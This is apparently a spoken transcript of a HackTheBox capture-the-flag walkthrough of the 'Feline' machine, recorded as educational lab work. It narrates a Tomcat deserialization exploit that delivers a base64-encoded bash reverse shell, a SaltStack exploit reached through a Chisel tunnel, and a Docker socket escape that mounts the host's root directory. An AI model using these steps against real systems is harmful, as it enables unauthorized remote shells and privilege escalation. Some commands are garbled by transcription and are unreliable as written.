Hey guys, I'm Ryan, and today I'm going to be showing you how to do Feline from HackTheBox. This was a really fun box, I really enjoyed it, but it was also somewhat frustrating. I spent a lot of time fiddling around with my payloads, trying to figure out why they weren't working and how to make them work, and in the process, I learned a whole bunch of new stuff that I didn't know before, so that's always awesome. This box starts off with an RCE in Tomcat, and you can use that to get a foothold on the box. From there, you can pivot to a Docker container by using a vulnerability in SaltStack, and then inside that Docker container, you can use an exposed Docker socket to spin up a second Docker container and mount the root file system inside of that. And from there, you can access the flags. So we are going to dive right into it. So the first thing I'm going to do is I'm going to make a new tab. I'm going to rename that tab to be the IP address of the box. I always do that so that way if I forget what the IP address is, it's just right there. I don't have to go hunting for it. I'm going to pop back over here and I'm going to do sudo nmap -sc for scripts, -sv for versions, -v for verbose, -on for output normal format. I'm going to call it nmap scan and then the IP address of the box. Right away, we can see we have port 22 for SSH and port 8080 open. So let's go ahead and check out port 8080 and see what we see. And we get this website right here, and we see this paragraph. It says, we provide a malware analysis service and testing platform right from the comfort of your browser, blah, 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 blah. So it looks like it's going to be a VirusTotal sort of inspired website. And if we look around, we can see that everything appears to be going nowhere except for this one service page. So if we go here, we can see this wonderful form. And there is a sample, and we can upload stuff here. So let's try to upload an image. I'm going to hit analyze, and it says upload successful. All right, so that's pretty cool. So we can upload stuff onto the server, but in order to make use of that, we need to know where it's going. So one way we might try to figure out where it's going is we might try to do a go bust. So if we do go buster dir -u http://10.10.10.205 port 8080 and then -w. We can do dirb common.txt, and we can try to run this just to see if there's any folders or directories where those uploads might be going to that we can then access, so we can try to pop a reverse shell and execute it. And our go bust is done, and it doesn't appear to be anything new or interesting in the results of that scan, just images, index.html, and service, the page that we are already on. So what we can try to do next is we can try to take a look at burp and see what burp has to say about it. So I'm just going to rerun analyze because I already have burp open and I have set it to be burp in my Foxy proxy. And we catch it in the proxy here. I'm going to send that over to the repeater. And we're just going to send that off to the races. And it says file uploaded successfully. So that's pretty neat. Maybe if I mess around with this file extension, I can get it to break. So maybe if I do a invalid file extension. Nope, that still works. Maybe if I do no file extension at all. That still works. How about no file name at all? And it breaks, and we get java.io file not found exception /opt/samples/uploads. And that looks to be the directory where these samples that we upload are probably actually going. Now, unfortunately for us, this is typically probably going to be out of scope of what we can reach within the web browser. So we might need to get some more information about what we can do before we can figure out how to make use of this upload function. So if we head back to the nmap scan, and we scroll up a little bit here, we can see that the version of Tomcat running on this is Tomcat 9.0.27. So if we just copy that and go over to Google and type in that plus exploit, make sure we disable the proxy so that we can actually go someplace, we find this wonderful article by Red Timmy, first result on Google, and it gives us Apache Tomcat RCE by Deserialization, CVE 2020-9484, and it gives us all of the pertinent information we need about this exploit. I'm not going to read over this entire thing or explain exactly how everything works because you can just read this article and it does a very good job of explaining, but I'll go over the pertinent details relevant for us to exploit it. So it says that versions 9.x of Tomcat are affected as long as they are below 35, and we are doing, if I want to say 27, yes, 27, so we are affected. And essentially what this says is that if we have the ability to upload some arbitrary file onto the server and we know where it's located, which we do, and this and the server is affected by this CVE, we can upload a serialized payload using like YSoSerial or something, and upload our payload to the server and specify that payload in this JSession ID, specify its location, and it will deserialize the payload and run our code. Again, the exact details of how this happens are on this article, as well as a few others. I will link those in the description if you want to check it out. But for now, let's go ahead and generate our YSoSerial payload. So in order to do that, we just need to know a couple things real quick. First of all, we can't just do a typical bash payload in YSoSerial and then try to use it with this, because it will actually break. What's happening in the background is doing runtime.exec, and that function doesn't like it when you output things to other objects. It doesn't like that complicated sort of functionality we need from our typical payload. So in order to do it, we're going to need to encode it with base64 and then use bash expansion to actually get it to run. So I'm just going to go over a brief explanation of bash expansion real quick. I hope I'm calling it that correctly. I have no idea if that's its actual name, but I'm going to continue calling it bash expansion. I'm going to double, triple, and quadruple down on that. You need to be running in bash. It doesn't work with ZSH. So if I were to do echo hello, it just does echo hello. It's the exact same as that. So all bash expansion is command, argument. That's essentially what it's doing. It's taking that and it's turning it into command argument. So if I were to do something like this, echo hello, and then pipe that to base64, I would get this wonderful base64 encoded string here. And then if I were to do the same exact thing again, but this time with that base64 encoded string, and then pipe that to base64, but with the -d argument in this format, it would decode it and then give us hello. So this is all this is doing, is it's just expanded this to be the base64 and then pipe base64 -d. It's the exact same thing as this. That's all this is doing. So that's bash expansion. So we're just going to head and we're going to encode our typical payload in base64. So we're going to do echo bash -i arrow ampersand /dev /tcp 10.10.10 nope 14.255. Is that correct? I believe that is correct, right? And then we're going to pipe that to base64, and we get our base64 output of our typical bash payload. We're going to copy that, and now we're going to need YSoSerial. So if you don't have YSoSerial, you can just Google YSoSerial and head over to the GitHub, and you will find the GitHub right here, and you can scroll down a little bit to the Jetpack, click on that, and you will get the latest jar file for YSoSerial. I already have it downloaded, so I'm not going to bother downloading it again. So we can head over here, and I have YSoSerial in my toolbox, so I will do java /jar. Well, first of all, I should actually go back into ZSH, clear. I have java -jar, and then toolbox, payloads, and then YSoSerial.jar. So I'm just going to run that, and we can see the various gadgets we can use, and there's many of them. So if we head back over to burp, we can actually know which gadget we want to use based on the fact that right here, this file output stream, the thing actually uploading the file to the disk is using Apache Commons, so we can probably use the Commons Collections gadget. Now, there are actually many Commons Collections gadgets. They're just different versions. Some of them are the same version. I'm not actually quite sure what the difference between these ones that are the same version are, but I'm just going to use 2 since it's version 4.0, the latest version, and it's just the first one in the list. So I'll just say Commons Collections 2 is the gadget I'm going to try. You could try all of them if one of them didn't work, but I'm just going to go from newest version down to oldest version, because that just seems to be the most sensible way to approach that. So I'll redo this again, and I'll do Commons Collections 2, and then we're going to need our payload. So our payload will be bash -c, and then echo the base64 we had earlier, close that, pipe that to base64 -d, and then pipe that to bash -i, and then close the quotes and send that out to be our payload.session. Now we can head over back to the malware analysis page, and I can go ahead and go to my Feline folder and grab our payload.session, hit analyze, and it says upload successful. So then I can just burp that, hit analyze again, grab that and burp, or drop that. I think that's the image, send to the repeater. Okay. And I'll just rename this to be our payload. And then over here, we have the image that I uploaded earlier. So I'm just going to get rid of all this crap, and I'm going to leave payload here in the event that we need to grab a payload again later on. What we do now is we just go ahead and we take this J session and we replace it with // // 5 of these, and then /opt /samples /uploads, and then our payload. We don't do the .session that gets added on by Tomcat as part of the CVE, so we just do that. And we're going to need to make sure that we, of course, have a netcat listener open. So do nc -lvp 99999, and I'll push this over here just so I can see if it actually goes, and if I send it, and yes, we do. We go ahead and we get a shell on the box. Wonderful, wonderful, wonderful. And that is the foothold. So now it is time to do some privilege escalation, everybody's favorite. So we're going to go ahead and we are going to go ahead and start a Python server. So I'm going to cd into my toolbox /privesc, and we're going to do python3 -m http.server. And the reason I'm doing this is because I have linps in here, so I'm going to download linps onto this box. And let's see, where are we? I'll cd into temp. How about that? And yeah, I'll go from here, and then we'll do a wget 10.10.10.255. What is it? 8,000? Yeah, 8,000 /linps.sh, and then chmod +x linps.sh, and then we'll do linps.sh, and it should. Oh, nope, that broke terribly. Oh, what we should do first, actually, is we should go ahead and turn this into a proper shell. So you know what? Let's move this over. And let's turn this into a proper shell. Let's do python3 -c imports pty dot spawns /bin /bash. Let's run that. And then let's do control C, and let's do stty raw -echo semicolon fg, hit enter, and now we should have a proper shell. So now I can do wget 10.10.10.255 8000 /linps.sh, and network is unreachable. Oh, I'm doing .10. I need to do .14. Make sure you have the right IP address in there. Of course, that's very helpful. And then we'll do a chmod +x linps.sh, and then we'll do linps.sh. Okay, and our linps is done running, so we can go ahead and take a look at this. And if we were to actually spend some time looking around this, we would notice that there is really not a ton here. There's really not much that looks particularly interesting. At some point, we will see a few things that are maybe interesting. We do see somewhere in here container D, if I recall correctly, but there's not really a ton here that looks obvious to Privesc other than these internal processes being run on these ports. So we can go ahead and we can try to figure out what's running on these ports internally, and we see 4505 and 4506, which I don't recognize what those ports are, and they're not like random ephemeral ports. So let's go ahead and try to Google that. So we'll start with 4505. So if we go back over here and we Google port 4505, and once again disable the proxy so we can get somewhere. And we see communication SaltStack documentation port 505. So there's a decent chance that SaltStack is running on port 505. So let's do SaltStack Exploit. We see there is a CVE, an exploit DB for it. Let's go ahead and look at that. And we see this Python file here, and it appears that this is from Jasper. So this is the GitHub right here. So we can just go directly to the GitHub, actually. That might be a bit better. And we see the GitHub for this exploit, and it says this is a proof of concept for the exploit based off of the initial check script, so he has some other thing here. And apparently this was reported by fsecure, run by Miko, and we can use this to get file system access. So that's pretty cool. Okay, so let's go ahead and just download this and see if we can grab anything useful, maybe get some privesc here. So I'm gonna open up a new tab here, and we're just gonna do a git clone github.git clone there. Let's cd into that, and we have exploit.py. So let's just run exploit.py, and it works for me. You might actually need to run pip and install salt, so you would just do pip3 install salt if you needed that. I already have it installed, so I do not. And just by running it, we can see that it needs 4506 apparently. So it is looking to grab 4506 on 127.0.0.1. What we need to do is we need to do some port forwarding. We need to do a reverse forward from the server to our box, from the box to our client here, and we can do that using something called Chisel. So if you don't know what Chisel is, it lets you do like tunneling, not that type of Chisel. Chisel Linux, maybe. Here we go. Here's the GitHub for Chisel, and it lets you make TCP UDP tunnels over SSH, HTTP, and it's great. So if you scroll down here, you can get the binaries and you can download those. You can use this command to install the binary if you wanted, or you could download it from any of the GZ archives here. I already have it downloaded, so I'm not going to download it again, but I'm currently in my privesc, and I actually have it in my privesc folder, the Chisel binary. So what I will do is I'm going to go ahead, and I'm just going to make a new terminal here, and I'm going to go to, I'm already in the privesc. Okay, so I'm just going to do Chisel, and let me just make sure I remember what the proper command here is. We're going to want to run server because we're doing reverse. We want the box to forward stuff to us, or we want the box to open up the port So we're going to say we are the server, and we're going to just do -p and then just some random port here that I haven't already used, and then we're going to do reverse. So get that listening on my Kali instance, and then we're going to go over here, and we're going to need to do wget 10.10.14.255 port 8000, and I need to download Chisel, and then I need to gmod +x Chisel, and the command we want to run here is Chisel. We want to run it in client mode, 10.10.14.255, which is my Kali instance's IP address, and then the port that I ran the initial listener on. And then we want to specify the remote port is 4506, and we want to run that on the local host, also using port 506. So if I run that, and it looks like we are connected. Now, if I go ahead and I can kill this web server, clear, and I can cd back into boxes / Feline, cd back into the CVE, and run Python 3 exploit.py. Okay, and it looks like it's running now. It's working, so we can do that same thing. Another new terminal here, myself-vp 99999, and I can say exec, and we can run bash scripts here. We can run commands, all that jazz. Now, the problem I had here is I tried to do additional, like inline, just a single payload, and it just, for the life of me, I could not get that to work. So I just downloaded a script originally that had the reverse shell in it, and then I ran the reverse shell. So we're just going to do that here. I'm just going to go to the RevSelf cheat sheet, and I'm just going to grab, I'm going to grab just a Python reverse shell, and we're going to open up a new tab. No, actually, nope. I'm going to cd into toolbox /privesc, and I'm going to nano python rev.sh, throw that Python reverse shell in there. And I'm just going to edit this to be the proper details. So 99999, as I always do, and 10.10.14.255. And we're going to change that to be Python 3 because that's probably going to work better. We're going to go back over here, and I think I actually do need another web server running, so we're going to do Python 3 -m http.server, and there we go. And then in here, I'm going to do wget 10.10.14.255 port 8000 / and then I named that Python rev.sh, so we'll run that. And it does look like it actually grabbed Python rev.sh from me. So then I'll go ahead and now I'll do chmod +x Python rev.sh. And I did try to do this with semicolons and it didn't work. So I'm just going to do it one at a time. And now finally we can just run Python rev.sh. And bada bing, bada boom, bada bam, we have roots. Except there's a problem. There's a problem. But before we even, let's just try to look around here. So if we cd and we look, yeah, we got some stuff. But if we cd into root, there's just, it's not there. The flag's not there. There's a to-do file. If we cat that to-do file, we see add SaltStack support to autospawn, sandbox Dockers through events, integrate changes to Tomcat, and make the service open to the public. Yeah, so if we look at this, we can actually see we're in a sandbox, we're in a Docker container. Now that is unfortunate. We can't really do anything. We can't grab the flag from within inside this Docker container. We're going to need to escape. We're going to need to have some way to access the outside world, phone home, get out of this Docker container. So we're going to do what we always do when we need to do stuff on a box after getting a shell. We're going to run linpiece. So we're just going to do a wget 10.10.14.255 / linpiece.sh, and I can go ahead and I can close out of this now. Okay, and right at that moment, the shell I had actually died, which is a great example of why you shouldn't close your dumber, lower privileged shells if you have them open, like I just did. You shouldn't do that because it makes getting your shell back a lot easier. I had to go and resend the burp payload real quick. It didn't take me too long since I had it all set up in burp, but nonetheless, that's why you leave stuff open if you can, and even get redundant shells open if you can. Anyway, let's move on. I'm going to go ahead and I'm going to wget 10.10.14.255 / linpiece.sh, and it says connection refused, and that's because, actually, you know what? Once again, let's do Python 3 -c import pty.spawn / bin / bash. Oh, I forgot the quote. Okay, and then let's do Control Z, stty raw -echo /fg, and there we go. Now I can go back up and down, and I did a colon there. Man, I did a lot of things wrong. Oh gosh. All right, port 8000 linpiece. There we go. And now we can chmod +x linpiece.sh, and then run that bad boy so we can see what we can do next. Okay, and I'm actually not even going to bother running the remainder of the scan because we can see right here that the Docker socket is writable, and that is huge. And we know that we're in a Docker container, and we know that we need to escape. So being able to write to a Docker socket is definitely promising when it comes to escaping a Docker container. And if we click this link, there is a wonderful little article talking about Docker socket and escaping, but I actually would prefer to not use this because it can lead you astray a little bit. If we just Google docker.sock and then the words escape, we get this other article, Escaping the Whale, Things You Probably Shouldn't Do with Docker Part 1, and it tells us some information about the Docker socket. For example, we can curl it and we can get access to this via the Docker socket API, the Docker web API. So we can curl it. So let's go ahead and literally just try to do that. I'm going to scroll down here so you guys can see that command. And we're going to try to do that exact thing. We're going to do curl -xget. We're going to specify that it's a Unix socket. We're going to do bar /run /docker.sock and then http /localhost containers, get that in JSON format, and we get this JSON, which tells us about the containers running currently, and that gives us, right here, this ID for one container, SaltStack, which is the one that we're in. We can do, instead of containers, we can do images to see what images are available. And it looks like there is repo tags sandbox latest. So that's the image that is currently available. So we can actually, what we can do is spin up a new Docker container and then mount the root directory of the box, the host, to a folder within that Docker container. You could do this a different way. You could actually do it such that you're spinning up the entire host as a Docker itself and then get access to everything. That way you could do it such that you're spinning up something where then you're literally escaping out of the Docker container and running something in the context of the host. You could do it many different ways. For this video, I'm just going to show you how to mount the entire root directory of the host as a folder so we can just get in there and get a flag. It's not the best way, but it's certainly the easiest way, and it covers what we need for the scope of this video. So first thing we need to do is we can copy this command on this article here, and again, that is escaping the whale, the things you probably shouldn't do with Docker. So we're going to copy this command, and this is basically just going to create some JSON that has the details that we need, and those details are right here. And we're going to specify the image, the command that should be run upon the Docker starting, some detach keys, some mount points, etc., all that jazz. We can go ahead and copy this, like I said, copy that, pop back over into here. Oh, I already have that right now. So then we're going to go ahead and say, from the source, we're going to copy the root directory. We could also just copy /root for our flags. And in fact, in this case, I will do that. I will just do /root, but you could do the entire root directory of the host and get access to the entire host's file system. But we'll just do /root because why not? We're just looking for the flags. And then we can mount that to host root. So we'll have a folder called host root, and we'll mount it there. And then we can go back, believe to the front here, yes, and we can change the image name to be what we saw before, which was sandbox. So now we can go ahead and copy that, and we can go back over here, and we can just paste it in, and it's going to create some JSON for us. And we can go here and copy this next line from this article, and this is going to go ahead and actually create the Docker container based off of this JSON that we got. So if you take a look at this, it's just saying we're going to send it some JSON, and then we're just accessing localhost /container/create. And this is all, once again, part of the Docker Web API, which you can look up and will be linked in the description if you want to know more about that. So we're going to go ahead and paste this in, and we get this Docker ID, and it has been connected. So in order to actually access that, we're going to need to start it up with this command, and then we're going to need to actually use Socat. There are other ways we could do this. We could have run a reverse shell when the Docker instance started up, for example, but I'm just going to follow this article and use Socat because it's a good chance to introduce Socat, which is like a super powerful upgraded version of Netcat. So we're going to use Socat to connect to the Docker instance. We're going to send it some raw HTTP requests, and we're going to get an upgraded shell into the box. So you can go ahead and you can download a Socat binary from just Googling it, and you can see that there is Socat binaries in this Git repo, which I will link, and you can download this Linux x86-64 Socat. Again, I already have that downloaded, so I'm not going to be downloading it again. I will just do a wget 10.10.14.255 port 8000, and then Socat. I'll do a chmod plus x Socat, and very good. So we go back over here, and we can go ahead and start the container that we just did. And before I do that, I'm going to go ahead and clear that out. And we can change this right here, containers /whatever before the /start. We can change this to the first 4 characters of the Docker container that we created, which in this case is F53D. So I will change this to be F53D, and I'm just doing it in this text editor just because it's easier. And we'll paste that, and now that is started. So now I can do Socat -unix connect, blah, blah, blah. But I'm also going to just edit this here so I can paste this in, And once again, that is going to be F5 3D. So we're going to change that to be F5 3D, copy that, and then we'll do, minimize that, and then we'll do this Socat -Unix connect /var/run/docker.soc. Oh, and then I actually should probably specify this period /, and then I can do this and paste in that, press enter one more time, and it says no such container. Oh, I guess if you're not quite fast enough, it might delete the container. So we can just recreate it. And where was the start command? Where was the start command? I do not see the start commands anywhere. Oh, I am blind. It is right here. So 0D08, start that. Socat, run that. 0D08. Copy that, paste that, enter, enter, and we're upgraded. And now if I type ls, I can see everything, and it's this like sort of dumb shell. We don't have a TTY or anything, but we can go ahead and then cd into host root and do ls, and then we can see that root.txt is right there. And if I wanted to, I could cat that, and we would get the, oops, I can't even do a backslash apparently. Yeah, this Socat is not a great shell, but Socat's really amazing for a lot of things. But there you go, you have it, there is the root.txt. So that is it, guys. I hope you enjoyed the video. I will be giving links to all the stuff that we talked about in the description. I thought this was a pretty interesting video. I didn't want to go too in-depth with escaping the Docker container, so I just went with the easiest one, which was just to mount a folder from the host file system inside the Docker container so you can access it. You can do tons of other stuff. There is a world of material on Docker escapes, as well as for the deserialization footholds. There is going to be material in the description talking about deserialization in general, as well as that specific CVE. But yeah, I thought this was cool overall. Each step of the box was really neat. You start off with a nice little deserialization exploit in Tomcat that I actually had never heard of before. You get to use Chisel and learn about Docker containers and docker.soc, and it's just a lot of fun. So if you enjoyed the video, as always, please like, subscribe, you go ahead, follow me on Twitter, you can head over to my HTTP profile, give respect, whatever you want to do, but I hope you enjoyed it, hope you learned something, and have a fantastic rest of your day.